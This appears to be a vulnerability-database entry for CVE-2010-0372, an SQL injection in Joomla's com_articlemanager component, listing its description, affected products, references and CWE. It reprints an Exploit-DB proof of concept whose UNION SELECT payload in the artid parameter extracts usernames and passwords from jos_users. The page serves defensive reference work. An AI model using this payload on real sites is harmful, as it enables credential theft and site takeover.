CVE-2010-0372
Description
SQL injection vulnerability in the Articlemanager (com_articlemanager) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the artid parameter in a display action to index.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component com_articlemanager - SQL Injection
########################################################################
# Joomla Component com_articlemanager SQL Injection Vulnerability
########################################################################
# Author :FL0RiX
#
# Name : com_articlemanager
#
# Bug Type : SQL Injection
#
# Infection : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://[server]/index.php?option=com_articlemanager&Itemid=349&task=display&artid=
#
#EXPLOIT : null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8/**/from/**/jos_users--
########################################################################
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| hong_chuyen | com_articlemanager | | |
| joomla | joomla\! | | |
References
- http://packetstormsecurity.org/1001-exploits/joomlaarticlemanager-sql.txt
- http://www.exploit-db.com/exploits/11140
- http://www.securityfocus.com/bid/37799
- https://exchange.xforce.ibmcloud.com/vulnerabilities/55664
- http://packetstormsecurity.org/1001-exploits/joomlaarticlemanager-sql.txt
- http://www.exploit-db.com/exploits/11140
- http://www.securityfocus.com/bid/37799
- https://exchange.xforce.ibmcloud.com/vulnerabilities/55664
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.